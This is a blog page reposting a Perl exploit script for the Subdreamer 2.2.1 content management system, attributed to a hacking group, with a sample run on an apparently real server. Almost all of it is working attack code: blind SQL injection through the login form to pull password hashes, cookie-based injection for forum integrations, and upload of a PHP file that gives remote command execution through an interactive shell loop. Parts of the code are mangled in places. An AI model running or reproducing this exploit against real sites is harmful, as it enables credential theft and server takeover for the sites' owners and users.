- Back to Home »
- Vulenerbilty »
- Subdreamer 2.2.1 SQL Injection / Command Execution Exploit
Saturday, August 6, 2011
#!/usr/bin/perl## Subdreamer 2.2.1 command exec exploit |
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |
## supported targets: |
## ~ without forum integration |
## ~ with phpBB2 integration |
## ~ with ipb2 integration |
## ~ with vbulletin2 integration |
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |
## based on RST/GHC advisory #35 |
## http://rst.void.ru/papers/advisory35.txt |
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |
## (c)oded by 1dt.w0lf - 19/09/2005 |
## RST/GHC |
## http://rst.void.ru |
## http://ghc.ru |
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |
## work: |
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |
## r57subdreamer.pl -p http://subdreamer.com.ru/ -u 2 -t 1 |
## ------------------------------------------------------------------ |
## [~] PATH : http://subdreamer.com.ru/ |
## [~] USER : 2 |
## [~] TARGET : 1 - PhpBB2 |
## [1] STEP 1 : TRY GET USER PASSWORD |
## [~] SEARCHING PASSWORD ... [ DONE ] |
## ----------------------------------------------------------- |
## USER_ID: 2 |
## PASS: 26310e438a5a1fb8622738f1e5d34f8b |
## ----------------------------------------------------------- |
## [2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE |
## [+] DONE! THIS USER HAVE ACCESS! |
## [3] STEP 3 : UPLOAD FILE |
## [+] DONE! FILE "img.php" UPLOADED |
## [+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =) |
## SUBDREAMER# id; uname -a; ls -la; |
## ---------------------------------------------------------------- |
## uid=1003(apache) gid=1003(apache) groups=1003(apache) |
## FreeBSD customer-3314.cit-network.net 5.3-RELEASE FreeBSD 5.3-RELEASE #0: |
## Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 |
## total 24 |
## drwxrwxrwx 5 enshteyn apache 512 Sep 19 23:04 . |
## drwxr-x--- 10 enshteyn apache 512 Sep 17 21:03 .. |
## drwxr-xr-x 2 enshteyn apache 512 Sep 10 14:09 Image |
## -rw-r--r-- 1 apache apache 48 Sep 19 23:04 img.php |
## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 logos |
## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 smilies |
## ---------------------------------------------------------------- |
## SUBDREAMER# exit |
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |
## config |
## ------ |
## |
## images folder |
$img_folder = 'images'; |
## or try |
##$img_folder = 'images/logos'; |
## |
## end config |
use LWP::UserAgent; |
use HTTP::Cookies; |
use Getopt::Std; |
getopts('u:p:h:t:'); |
$path = $opt_p; |
$user = $opt_u; |
$hash = $opt_h; |
$target = $opt_t || 0; |
$s_num = 1; |
$|++; |
$n = 0; |
@targets = ( |
#['target name','colimn1 in database','colimn2 in database','cookie name 1','cookie name 2'] |
['Subdreamer without forum','userid','password','sduserid','sdpassword'], |
['PhpBB2','user_id','user_password','phpbb2mysql_data',''], |
['IPB2','id','member_login_key','member_id','pass_hash'], |
['PhpBB2 cookie injection','','','phpbb2mysql_data',''], |
['IPB2 cookie injection','id','','member_id','pass_hash'], |
['Vbulletin cookie injection','userid','','bbuserid','bbpassword'], |
); |
if (!$path || !$user || $target<0 || $target>5) { &usage; } |
&head(); |
if($path=~/[^\/]$/) { $path .= '/'; } |
print "[~] PATH : $path\r\n"; |
print "[~] USER : $user\r\n"; |
print "[~] TARGET : $target - $targets[$target][0]\r\n"; |
if($target==1||$target==2||$target==0) { |
print "[1] STEP 1 : TRY GET USER PASSWORD\r\n"; |
if(!$hash){ |
print "[~] SEARCHING PASSWORD ... [|]"; |
FIND: while(1) |
{ |
if(&found(47,58)==0) { &found(96,103); } |
$char = $i; |
if ($char=="0") |
{ |
if(length($allchar) > 0){ |
print qq{\b\b DONE ] |
----------------------------------------------------------- |
USER_ID: $user |
PASS: $allchar |
----------------------------------------------------------- |
}; |
last FIND; |
} |
else |
{ |
print "\b\b FAILED ]"; |
} |
exit(); |
} |
else |
{ |
$allchar .= chr($char); |
} |
$s_num++; |
} |
} |
else |
{ |
print "[~] SKIP. HASH EXISTS\r\n"; |
$allchar = $hash; |
} |
} |
print "[2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE\r\n"; |
if(&check_admin_rights()) |
{ |
print "[+] DONE! THIS USER HAVE ACCESS!\r\n"; |
} |
else |
{ |
print "[-] DAMN! THIS USER NOT ADMIN =(\r\n"; |
exit(); |
} |
print "[3] STEP 3 : UPLOAD FILE\r\n"; |
if(&upload_file()) |
{ |
print "[+] DONE! FILE \"img.php\" UPLOADED\r\n"; |
} |
else |
{ |
print "[-] DAMN! UPLOAD ERROR =(\r\n"; |
exit(); |
} |
print "[+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)\r\n"; |
while () |
{ |
print "SUBDREAMER# "; |
while( |
{ |
$cmd=$_; |
chomp($cmd); |
exit() if ($cmd eq 'exit'); |
last; |
} |
&run($cmd); |
} |
|
sub found($$) |
{ |
my $fmin = $_[0]; |
my $fmax = $_[1]; |
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; } |
|
$r = int($fmax - ($fmax-$fmin)/2); |
$check = " BETWEEN $r AND $fmax"; |
if ( &check($check) ) { &found($r,$fmax); } |
else { &found($fmin,$r); } |
} |
|
sub crack($$) |
{ |
my $cmin = $_[0]; |
my $cmax = $_[1]; |
$i = $cmin; |
while ($i<$cmax) |
{ |
$crcheck = "=$i"; |
if ( &check($crcheck) ) { return $i; } |
$i++; |
} |
$i = 0; |
return $i; |
} |
|
sub check($) |
{ |
$n++; |
status(); |
$ccheck = $_[0]; |
$username = "no_such_user' OR (".$targets[$target][1]."=".$user." AND (ascii(substring(".$targets[$target][2].",".$s_num.",1))".$ccheck.")) /*"; |
|
$xpl = LWP::UserAgent->new() or die; |
$res = $xpl->post($path.'index.php', |
{ |
"loginusername" => $username, |
"loginpassword" => "nap0Jlb_Haxep", |
"login" => "login", |
"Submit now" => "Login" |
} |
); |
@results = $res->content; |
|
foreach $result(@results) |
{ |
if ($result =~ /(Database error)|(Invalid SQL)/i) |
{ |
print "\r\n[-] SQL SYNTAX ERROR! CHECK TARGET!\r\n"; |
exit(); |
} |
#print $result; |
# english pattern |
if ($result =~ /Wrong Password/) { return 1; } |
# russian pattern |
if ($result =~ /...... ......./) { return 1; } |
# russian pattern 2 |
if ($result =~ /............ ....../) { return 1; } |
# russian pattern 3 ( KOI8-R tested on subdreamer.com.ru ) |
if ($result =~ /...... ......./) { return 1; } |
} |
return 0; |
} |
|
sub status() |
{ |
$status = $n % 5; |
if($status==0){ print "\b\b/]"; } |
if($status==1){ print "\b\b-]"; } |
if($status==2){ print "\b\b\\]"; } |
if($status==3){ print "\b\b|]"; } |
} |
sub check_admin_rights() |
{ |
$xpl = LWP::UserAgent->new() or die; |
$cookie_jar = HTTP::Cookies->new( ); |
$xpl->cookie_jar( $cookie_jar ); |
($host = $path) =~ s!http://([^/]*).*!$1!; |
if($target == 1) |
{ |
# not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ??? |
#$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,); |
# default phpbb2 cookie |
$cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,); |
} |
elsif($target == 3) |
{ |
# phpbb2 cookie with sql injection |
$cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,); |
} |
elsif($target == 4) |
{ |
# ipb2 cookie with sql injection |
$cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,); |
$cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,); |
} |
elsif($target == 5) |
{ |
# Vbulletin cookie with sql injection |
$cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,); |
$cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,); |
} |
else |
{ |
# subdreamer || ipb2 cookies |
$cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,); |
$cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,); |
} |
|
$res = $xpl->get($path."admin/index.php"); |
if($res->content =~ /loginpassword/) { return 0; } |
else { return 1; } |
} |
sub upload_file() |
{ |
$xpl = LWP::UserAgent->new() or die; |
$cookie_jar = HTTP::Cookies->new( ); |
$xpl->cookie_jar( $cookie_jar ); |
($host = $path) =~ s!http://([^/]*).*!$1!; |
|
if($target == 1) |
{ |
# not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ??? |
#$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,); |
# default phpbb2 cookie |
$cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,); |
} |
elsif($target == 3) |
{ |
# phpbb2 cookie with sql injection |
$cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,); |
} |
elsif($target == 4) |
{ |
# ipb2 cookie with sql injection |
$cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,); |
$cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,); |
} |
elsif($target == 5) |
{ |
# Vbulletin cookie with sql injection |
$cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,); |
$cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,); |
} |
else |
{ |
# subdreamer || ipb2 cookies |
$cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,); |
$cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,); |
} |
|
$res = $xpl->post($path.'admin/imagemanager.php',Content_Type => 'form-data', |
Content => [ |
'action' => 'uploadimage', |
'folderpath' => "../$img_folder/", |
'MAX_FILE_SIZE' => '1000000', |
'image' => [ |
undef, |
'img.php', |
Content_type => 'text/plain', |
Content => '', |
], |
'submit' => 'Upload Image', |
], |
); |
if($res->content =~ /Settings Updated/) { return 1; } |
if($res->content =~ /Uploading Errors/) { return 0; } |
else { return 1; } |
} |
sub run() |
{ |
$xpl = LWP::UserAgent->new() or die; |
$res = $xpl->post($path.$img_folder.'/img.php',{'cmd'=>$cmd}); |
print "----------------------------------------------------------------\r\n"; |
print $res->content; |
print "----------------------------------------------------------------\r\n"; |
} |
sub usage() |
{ |
&head(); |
print q(| | |
| - Usage: | |
| r57subdreamer.pl -p |
| |
| for bruteforce | |
| for this user if you have it =\) | |
| - Available targets: | |
| - brute password: | |
| 0 - Subdreamer without forum integration ( default ) | |
| 1 - Subdreamer with PhpBB2 integration | |
| 2 - Subdreamer with IPB2 integration | |
| - cookie sql injection, dont need brute password: | |
| 3 - Subdreamer with PhpBB2 integration 2 | |
| 4 - Subdreamer with IPB2 integration 2 | |
| 5 - Subdreamer with Vbulletin integration | |
+--------------------------------------------------------------------+ |
| e.g.: | |
| r57subdreamer.pl -p http://127.0.0.1/subdreamer/ -u 1 | |
| r57subdreamer.pl -p http://www.subdreamer.com.ru -u 2 -t 1 | |
+--------------------------------------------------------------------+ |
| visit us: http://rst.void.ru , http://ghc.ru | |
+--------------------------------------------------------------------+ |
); |
exit(); |
} |
sub head() |
{ |
print q( |
+--------------------------------------------------------------------+ |
| Subdreamer version 2.2.1 sql injection + command execution exploit | |
| by 1dt.w0lf | |
| RST/GHC | |
+--------------------------------------------------------------------+ |
);}